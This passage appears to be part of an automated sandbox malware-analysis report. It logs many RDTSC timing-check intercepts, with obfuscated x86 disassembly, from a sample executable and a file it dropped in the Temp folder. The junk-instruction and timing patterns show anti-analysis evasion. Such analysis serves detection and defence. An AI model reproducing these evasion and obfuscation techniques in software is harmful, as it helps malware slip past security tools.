00007FD358ED10FAh 0x00000051 mov dword ptr [esp], eax 0x00000054 jmp 00007FD358ED1100h 0x00000059 xchg eax, ebx 0x0000005a pushad 0x0000005b call 00007FD358ED10FEh 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 56206AF second address: 56206F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FD358DA46E1h 0x0000000b jmp 00007FD358DA46DBh 0x00000010 popfd 0x00000011 popad 0x00000012 push eax 0x00000013 jmp 00007FD358DA46E9h 0x00000018 xchg eax, ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push edx 0x0000001d pop ecx 0x0000001e mov bl, 6Ch 0x00000020 popad 0x00000021 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620764 second address: 5620062 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED1101h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD3C994EFD2h 0x0000000f xor eax, eax 0x00000011 jmp 00007FD358EAA82Ah 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e sub esp, 04h 0x00000021 mov edi, eax 0x00000023 xor ebx, ebx 0x00000025 cmp edi, 00000000h 0x00000028 je 00007FD358ED1307h 0x0000002e call 00007FD35D7EE128h 0x00000033 mov edi, edi 0x00000035 jmp 00007FD358ED1105h 0x0000003a xchg eax, ebp 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007FD358ED10FCh 0x00000042 and esi, 196644B8h 0x00000048 jmp 00007FD358ED10FBh 0x0000004d popfd 0x0000004e jmp 00007FD358ED1108h 0x00000053 popad 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007FD358ED10FEh 0x0000005c rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620062 second address: 5620074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD358DA46DEh 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620074 second address: 56200CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a jmp 00007FD358ED10FDh 0x0000000f pushfd 0x00000010 jmp 00007FD358ED1100h 0x00000015 sub ecx, 3E7903D8h 0x0000001b jmp 00007FD358ED10FBh 0x00000020 popfd 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 jmp 00007FD358ED1106h 0x00000029 xchg eax, ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 56200CE second address: 5620107 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358DA46E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD358DA46DBh 0x0000000f xchg eax, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD358DA46E0h 0x00000019 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620107 second address: 5620116 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED10FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620BD1 second address: 5620BD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620BD7 second address: 5620BDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620BDB second address: 5620C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FD358DA46E9h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD358DA46DDh 0x00000017 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620C0E second address: 5620C1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD358ED10FCh 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620C1E second address: 5620C4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358DA46DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [760F459Ch], 05h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD358DA46E5h 0x00000019 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620C4D second address: 5620C70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 movzx ecx, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FD3C993EE9Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD358ED10FDh 0x0000001b rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620C70 second address: 5620C85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358DA46E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620C85 second address: 5620C95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD358ED10FCh 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620C95 second address: 5620C99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620CDE second address: 5620D0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FD358ED10F9h 0x0000000d jmp 00007FD358ED1104h 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ebx 0x00000018 mov ah, CFh 0x0000001a popad 0x0000001b rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620E2E second address: 5620E34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620E89 second address: 5620E99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD358ED10FCh 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620E99 second address: 5620EC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358DA46DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test al, al 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD358DA46E5h 0x00000014 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620EC3 second address: 5620ED3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD358ED10FCh 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620ED3 second address: 5620ED7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620ED7 second address: 5620F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FD3C9934B9Ch 0x0000000e pushad 0x0000000f call 00007FD358ED10FDh 0x00000014 movzx esi, dx 0x00000017 pop edx 0x00000018 pushfd 0x00000019 jmp 00007FD358ED10FAh 0x0000001e and eax, 77C204A8h 0x00000024 jmp 00007FD358ED10FBh 0x00000029 popfd 0x0000002a popad 0x0000002b cmp dword ptr [ebp+08h], 00002000h 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 push ebx 0x00000036 pop esi 0x00000037 mov cx, dx 0x0000003a popad 0x0000003b rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630A56 second address: 5630A5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630A5A second address: 5630A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630A60 second address: 5630A76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD358DA46E2h 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630A76 second address: 5630AC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a jmp 00007FD358ED10FDh 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 jmp 00007FD358ED1103h 0x00000018 mov bl, ch 0x0000001a popad 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FD358ED1107h 0x00000023 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630AC1 second address: 5630B0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358DA46E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c jmp 00007FD358DA46DEh 0x00000011 mov esi, dword ptr [ebp+0Ch] 0x00000014 jmp 00007FD358DA46E0h 0x00000019 test esi, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630B0A second address: 5630B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630B0E second address: 5630B14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630B14 second address: 5630B1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630B1A second address: 5630B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630B1E second address: 5630B22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630B22 second address: 5630B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FD3C9801F63h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FD358DA46E8h 0x00000015 and eax, 2CA06DE8h 0x0000001b jmp 00007FD358DA46DBh 0x00000020 popfd 0x00000021 popad 0x00000022 cmp dword ptr [760F459Ch], 05h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FD358DA46E1h 0x00000030 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630B77 second address: 5630B87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD358ED10FCh 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630B87 second address: 5630B9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FD3C9819FDEh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630B9B second address: 5630BA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630BA1 second address: 5630BB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD358DA46DEh 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630C26 second address: 5630CA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD358ED1103h 0x00000009 xor ax, C8BEh 0x0000000e jmp 00007FD358ED1109h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FD358ED1100h 0x0000001a add eax, 2556F9B8h 0x00000020 jmp 00007FD358ED10FBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d call 00007FD358ED1102h 0x00000032 pop eax 0x00000033 jmp 00007FD358ED10FBh 0x00000038 popad 0x00000039 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630CCB second address: 5630CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630CCF second address: 5630CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630CD3 second address: 5630CD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630CD9 second address: 5630CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630CDF second address: 5630D08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a mov eax, 15AC31B5h 0x0000000f mov di, cx 0x00000012 popad 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD358DA46E3h 0x0000001b rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12BF1B2 second address: 12BF1C7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD358ED10FEh 0x00000008 jng 00007FD358ED10F6h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12BF1C7 second address: 12BF1E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD358DA46D6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007FD358DA46D6h 0x00000016 jp 00007FD358DA46D6h 0x0000001c rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C46E9 second address: 12C4708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FD358ED10FAh 0x0000000f pushad 0x00000010 popad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jmp 00007FD358ED10FCh 0x00000018 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C4B12 second address: 12C4B18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C4C8F second address: 12C4CC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED1107h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FD358ED1107h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C4CC6 second address: 12C4CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C4CD1 second address: 12C4CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C4E44 second address: 12C4E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C4E4D second address: 12C4E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 jmp 00007FD358ED1106h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C4E72 second address: 12C4E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C4E7F second address: 12C4E90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED10FBh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6802 second address: 12C680A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6921 second address: 12C6926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C697D second address: 12C69B1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD358DA46DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D2664h], ecx 0x00000013 push 00000000h 0x00000015 xor dword ptr [ebp+122DBCE1h], ebx 0x0000001b call 00007FD358DA46D9h 0x00000020 push ecx 0x00000021 pushad 0x00000022 jnl 00007FD358DA46D6h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C69B1 second address: 12C69FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 jng 00007FD358ED10FEh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push eax 0x00000013 jo 00007FD358ED10F6h 0x00000019 pop eax 0x0000001a pushad 0x0000001b jno 00007FD358ED10F6h 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 popad 0x00000024 popad 0x00000025 mov eax, dword ptr [eax] 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FD358ED1109h 0x0000002f rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6AC8 second address: 12C6ADC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD358DA46E0h 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6ADC second address: 12C6B02 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD358ED1109h 0x00000012 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6B02 second address: 12C6B0C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD358DA46D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6B0C second address: 12C6B2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED1104h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6B2D second address: 12C6B34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6B34 second address: 12C6B6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007FD358ED10F6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 jg 00007FD358ED110Dh 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jl 00007FD358ED10F8h 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6B6F second address: 12C6B8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD358DA46E9h 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6B8C second address: 12C6BDC instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD358ED10F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d mov si, FBD1h 0x00000011 lea ebx, dword ptr [ebp+1245A6FBh] 0x00000017 jmp 00007FD358ED1103h 0x0000001c jno 00007FD358ED10FCh 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 jp 00007FD358ED10F8h 0x0000002a je 00007FD358ED10F8h 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push ebx 0x00000039 pop ebx 0x0000003a rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6BDC second address: 12C6BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6BE0 second address: 12C6BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6C1F second address: 12C6C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12C6C23 second address: 12C6C61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jmp 00007FD358ED1102h 0x0000000d nop 0x0000000e mov si, cx 0x00000011 push 00000000h 0x00000013 sub dword ptr [ebp+122D288Fh], eax 0x00000019 push 2A71AFE0h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD358ED1101h 0x00000025 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E60E8 second address: 12E60EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRDTSC instruction interceptor: First address: 12E60EC second address: 12E60F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
